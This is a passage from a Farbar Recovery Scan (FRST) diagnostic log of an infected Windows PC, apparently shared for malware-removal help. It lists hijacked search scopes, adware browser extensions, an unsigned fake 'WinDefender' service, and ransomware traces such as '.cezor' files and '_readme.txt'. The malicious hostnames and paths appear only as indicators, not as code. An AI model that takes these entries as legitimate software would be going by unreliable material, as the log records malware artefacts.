    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161658923 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQtZAAwVRQQQbQ4IUFpcFQ1HIRRZVQsXDFMRcVsMVw8QRAMWdx9aFQQTSEcFME0FCFwEURNNfW1KCFgfRllGFEtZCFU=&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161703507 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQtZAAwVRQQQbQ4IUFpcFQ1HIRRZVQsXDFMRcVsMVw8QRAMWdx9aFQQTSEcFME0FCFwEURNNfW1KCFgfRllGFEtZCFU=&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161703507 -> OldSearch URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQtZAAwVRQQQbQ4IUFpcFQ1HIRRZVQsXDFMRcVsMVw8QRAMWdx9aFQQTSEcFME0FCFwEURNNfW1KCFgfRllGFEtZCFU=&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161703507 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQtZAAwVRQQQbQ4IUFpcFQ1HIRRZVQsXDFMRcVsMVw8QRAMWdx9aFQQTSEcFME0FCFwEURNNfW1KCFgfRllGFEtZCFU=&q={searchTerms}
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2013-07-10] (Microsoft Corporation -> Microsoft Corporation)
    BHO: YoutubeAdBlock -> {7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} -> C:\Program Files (x86)\vONNFjhTKIE\trHrwkx7.dll => No File
    BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> No File
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2013-09-13] (Microsoft Corporation -> Microsoft Corporation)
    BHO: MyStart Toolbar -> {ccb24e92-62c4-4c53-95d2-65f9eed476bc} -> C:\Program Files (x86)\mystarttb\mystartDx64.dll => No File
    BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll => No File
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssv.dll [2019-07-06] (Oracle America, Inc. -> Oracle Corporation)
    BHO-x32: YoutubeAdBlock -> {7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} -> C:\Program Files (x86)\vONNFjhTKIE\kbNfsOv.dll [2019-07-09] () [File not signed]
    BHO-x32: Triangle Trail -> {aeef4389-6327-45e5-9552-021c0f5aef2d} -> No File
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\PROGRA~2\MICROS~1\Office15\URLREDIR.DLL => No File
    BHO-x32: MyStart Toolbar -> {ccb24e92-62c4-4c53-95d2-65f9eed476bc} -> C:\Program Files (x86)\mystarttb\mystartDx.dll => No File
    BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\PROGRA~2\MICROS~1\Office15\GROOVEEX.DLL => No File
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2ssv.dll [2019-07-06] (Oracle America, Inc. -> Oracle Corporation)
    Toolbar: HKLM - MyStart Toolbar - {ccb24e92-62c4-4c53-95d2-65f9eed476bc} - C:\Program Files (x86)\mystarttb\mystartDx64.dll No File
    Toolbar: HKLM-x32 - MyStart Toolbar - {ccb24e92-62c4-4c53-95d2-65f9eed476bc} - C:\Program Files (x86)\mystarttb\mystartDx.dll No File
    Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
    Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
    Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
    Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
    StartMenuInternet: IEXPLORE.EXE - iexplore.exe

    FireFox:
    ========
    FF DefaultProfile: 5xrpb4mz.default
    FF ProfilePath: C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default [2019-07-08]
    FF user.js: detected! => C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\user.js [2015-12-10]
    FF Homepage: Mozilla\Firefox\Profiles\5xrpb4mz.default -> file:///C:/ProgramData/Quoteexs/ff.HP
    FF NewTab: Mozilla\Firefox\Profiles\5xrpb4mz.default -> file:///C:/ProgramData/Quoteexs/ff.NT
    FF Extension: (MyStart Toolbar) - C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\Extensions\{607b689f-7600-45e4-b8e5-887f72dab15c} [2015-11-07] [Legacy] [not signed]
    FF Extension: (Triangle Trail) - C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\Extensions\{f2e0e2a9-4e09-4b8a-aadb-fa21ba86ba05}.xpi [2015-12-04] [Legacy] [not signed]
    FF SearchPlugin: C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\searchplugins\default.xml [2016-06-26]
    FF SearchPlugin: C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\searchplugins\findit.xml [2019-07-08]
    FF SearchPlugin: C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\searchplugins\yahoo_ff.xml [2015-12-25]
    FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-16] (VideoLAN) [File not signed]
    FF Plugin-x32: @java.com/DTPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\dtplugin\npDeployJava1.dll [2019-07-06] (Oracle America, Inc. -> Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\plugin2\npjp2.dll [2019-07-06] (Oracle America, Inc. -> Oracle Corporation)
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [No File]
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [No File]
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Users\ADMIN\AppData\Roaming\mozilla\plugins\np-mswmp.dll [2015-11-07]

    Chrome:
    =======
    CHR HomePage: Default -> hxxp://search.gboxapp.com/
    CHR StartupUrls: Default -> "hxxp://search.gboxapp.com/"
    CHR DefaultSearchURL: Default -> hxxp://selected-search.com/search?q={searchTerms}&
    CHR DefaultSearchKeyword: Default -> ss
    CHR Profile: C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default [2019-07-10]
    CHR Extension: (Slides) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-11-18]
    CHR Extension: (Docs) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-11-18]
    CHR Extension: (Google Drive) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17]
    CHR Extension: (YouTube) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-07]
    CHR Extension: (Google Search) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-07]
    CHR Extension: (Slither.io Skins, Mods, Hack & Guide) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dggomkijbihggjgcgdbnleolpleddaid [2016-07-03]
    CHR Extension: (Sheets) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-11-18]
    CHR Extension: (Adblocker for Youtube™) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffpfiaecfobeadhikddakkmaapliokib [2019-07-09] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
    CHR Extension: (Google Slides Offline) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fidipdaiencjpnmkjcebeclkgalhcedi [2019-07-09] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
    CHR Extension: (Agar.io Powerups) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fildelalboaapchneclkaacmdcdapolj [2016-02-05]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-03]
    CHR Extension: (Gmail) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-28]
    CHR Extension: (Chrome Media Router) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-06-22]
    CHR Profile: C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\System Profile [2019-07-09]
    CHR Extension: (Adblocker for Youtube™) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\ffpfiaecfobeadhikddakkmaapliokib [2019-07-09] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
    CHR HKLM\...\Chrome\Extension: [afgeoapebnkefelmpoepnmjiflidjjce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [egenicdiafgbhogabodhpfcbcgnpocip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [hppemobdikemkbmccnjbilolonmpaljl] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [pdpcpceofkopegffcdnffeenbfdldock] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [afgeoapebnkefelmpoepnmjiflidjjce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [egenicdiafgbhogabodhpfcbcgnpocip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [hppemobdikemkbmccnjbilolonmpaljl] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pdpcpceofkopegffcdnffeenbfdldock] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [afgeoapebnkefelmpoepnmjiflidjjce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [egenicdiafgbhogabodhpfcbcgnpocip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [hppemobdikemkbmccnjbilolonmpaljl] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pdpcpceofkopegffcdnffeenbfdldock] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [afgeoapebnkefelmpoepnmjiflidjjce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [egenicdiafgbhogabodhpfcbcgnpocip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [hppemobdikemkbmccnjbilolonmpaljl] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pdpcpceofkopegffcdnffeenbfdldock] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [afgeoapebnkefelmpoepnmjiflidjjce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [egenicdiafgbhogabodhpfcbcgnpocip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [hppemobdikemkbmccnjbilolonmpaljl] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [iphahelpmejkbidhiecfeicblienleon] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [npdicihegicnhaangkdmcgbjceoemeoo] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [pdpcpceofkopegffcdnffeenbfdldock] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx

    Opera:
    =======
    OPR Extension: (Adblocker for Youtube™) - C:\Users\ADMIN\AppData\Roaming\Opera Software\Opera Stable\Extensions\nknpohplagminmhchlbhigcgcdfigion [2019-07-09]

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2019-07-08] () [File not signed] <==== ATTENTION
    S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1547200 2017-10-30] (Epic Games Inc. -> )
    R2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [1490432 2019-07-08] (TODO: <Company name>) [File not signed]
    S2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [339456 2010-11-16] () [File not signed]
    R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [206472 2018-10-05] (Logitech Inc -> Logitech Inc.)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6744288 2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
    R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5702416 2015-09-11] (TeamViewer -> TeamViewer GmbH)
    S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
    R2 WinDefender; C:\Windows\windefender.exe [1435136 2019-07-08] () [File not signed]
    S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\Dr.Fone for Android\DriverInstall.exe" [X]

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes)
    U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [117248 2018-04-01] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
    R3 huawei_enumerator; C:\Windows\System32\DRIVERS\ew_jubusenum.sys [86016 2018-04-01] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
    S3 hwdatacard; C:\Windows\System32\DRIVERS\ewusbmdm.sys [221312 2018-04-01] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
    R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-11-16] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation)
    S2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech -> Logitech)
    R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [67736 2018-10-05] (Logitech Inc -> Logitech Inc.)
    R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [199768 2019-07-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [224408 2019-07-10] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [73584 2019-07-10] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [106344 2019-07-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 Serenum; C:\Windows\System32\DRIVERS\nuvserenum.sys [23552 2014-01-12] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
    R3 Serial; C:\Windows\System32\DRIVERS\nuvserial.sys [86016 2014-01-12] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One month (created) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-07-10 17:30 - 2019-07-10 17:32 - 000064880 _____ C:\Users\ADMIN\Desktop\FRST.txt
    2019-07-10 17:30 - 2019-07-10 17:30 - 000000000 ___DC C:\FRST
    2019-07-10 17:29 - 2019-07-10 17:29 - 002420224 _____ (Farbar) C:\Users\ADMIN\Desktop\help.exe
    2019-07-10 16:15 - 2019-07-10 16:15 - 000224408 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
    2019-07-10 16:15 - 2019-07-10 16:15 - 000073584 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
    2019-07-09 20:39 - 2019-07-09 20:39 - 000106344 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
    2019-07-09 16:56 - 2019-07-09 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightshot
    2019-07-09 16:56 - 2019-07-09 16:56 - 000000000 ____D C:\Program Files (x86)\Skillbrains
    2019-07-09 16:55 - 2019-07-09 16:55 - 002731128 _____ (Skillbrains ) C:\Users\ADMIN\Downloads\setup-lightshot.exe
    2019-07-09 15:12 - 2019-07-09 15:12 - 000000000 ____D C:\Users\ADMIN\AppData\Local\mbam
    2019-07-09 15:10 - 2019-07-09 15:10 - 000199768 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
    2019-07-09 15:10 - 2019-07-09 15:10 - 000000000 ____D C:\Users\ADMIN\AppData\Local\mbamtray
    2019-07-09 15:09 - 2019-07-09 15:09 - 000001827 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2019-07-09 15:09 - 2019-07-09 15:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2019-07-09 15:09 - 2019-07-09 15:09 - 000000000 ____D C:\ProgramData\Malwarebytes
    2019-07-09 15:09 - 2019-07-09 15:09 - 000000000 ____D C:\Program Files\Malwarebytes
    2019-07-09 15:09 - 2019-01-08 16:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
    2019-07-09 15:07 - 2019-07-09 15:36 - 064446574 _____ C:\Users\ADMIN\Downloads\mb3-setup-consumer-3.8.3.2965-1.0.613-1.0.11450.exe.cezor
    2019-07-09 15:06 - 2019-07-10 16:25 - 000000000 ____D C:\Program Files (x86)\BbdjrrKUeUXuC
    2019-07-09 15:06 - 2019-07-09 20:47 - 000000000 ____D C:\Program Files (x86)\WOFbcaOaHmAU2
    2019-07-09 15:06 - 2019-07-09 18:05 - 000000000 ____D C:\Program Files (x86)\vONNFjhTKIE
    2019-07-09 15:06 - 2019-07-09 16:01 - 000000000 ____D C:\Program Files (x86)\uvtpOaoQoRUn
    2019-07-09 15:06 - 2019-07-09 15:06 - 000003202 _____ C:\Windows\System32\Tasks\AWWcazHJnUfLPA
    2019-07-09 15:06 - 2019-07-09 15:06 - 000002890 _____ C:\Windows\System32\Tasks\mrAArNosEtAJT2
    2019-07-09 15:06 - 2019-07-09 15:06 - 000002872 _____ C:\Windows\System32\Tasks\raSRPAMuIMRBbwMvC2
    2019-07-09 15:06 - 2019-07-09 15:06 - 000002860 _____ C:\Windows\System32\Tasks\txgYfgWClJeJBSoaCDR2
    2019-07-09 15:06 - 2019-07-09 15:06 - 000002850 _____ C:\Windows\System32\Tasks\JSpPUlYEOjGQEpF2
    2019-07-09 15:06 - 2019-07-09 15:06 - 000000000 ____D C:\ProgramData\JrsbweBqGiQFiyVB
    2019-07-09 15:06 - 2019-07-09 15:06 - 000000000 ____D C:\Program Files (x86)\woOqILJDRwqbnTOZbgR
    2019-07-09 15:06 - 2019-07-09 15:06 - 000000000 ____D C:\Program Files (x86)\rZdaClXBU
    2019-07-09 15:05 - 2019-07-09 16:00 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\yrgtajo5ceo
    2019-07-09 15:05 - 2019-07-09 16:00 - 000000000 ____D C:\Program Files\A5H2CDJ5DL
    2019-07-08 17:15 - 2019-07-09 16:00 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\nhhb4gpoag4
    2019-07-08 17:15 - 2019-07-09 16:00 - 000000000 ____D C:\Program Files\1B0ZGH03DT
    2019-07-08 17:03 - 2019-07-09 15:36 - 000000391 _____ C:\Users\ADMIN\Downloads\policies.json.cezor
    2019-07-08 16:55 - 2019-07-09 16:00 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\st1oaktw2ol
    2019-07-08 16:55 - 2019-07-09 16:00 - 000000000 ____D C:\Program Files\9RIR0W407U
    2019-07-08 16:40 - 2019-07-08 16:40 - 000003154 _____ C:\Windows\System32\Tasks\{70FDB57E-0921-404D-8CC7-ADDDC8F32EF0}
    2019-07-08 16:36 - 2019-07-08 16:36 - 000003584 _____ C:\Windows\System32\Tasks\{B7E4FFCD-3871-411A-A449-6E0BC062B522}
    2019-07-08 16:20 - 2019-07-09 18:11 - 000256608 _____ C:\Users\ADMIN\AppData\Roaming\appdata.dat
    2019-07-08 16:18 - 2019-07-09 15:58 - 000003248 _____ C:\Windows\System32\Tasks\lsa64
    2019-07-08 16:18 - 2019-07-08 16:18 - 000001172 _____ C:\Users\ADMIN\_readme.txt
    2019-07-08 16:17 - 2019-07-09 18:06 - 000000000 ____D C:\Users\ADMIN\AppData\Local\41915b66-3c0e-4c75-b4d9-0c7c8eb59d6c
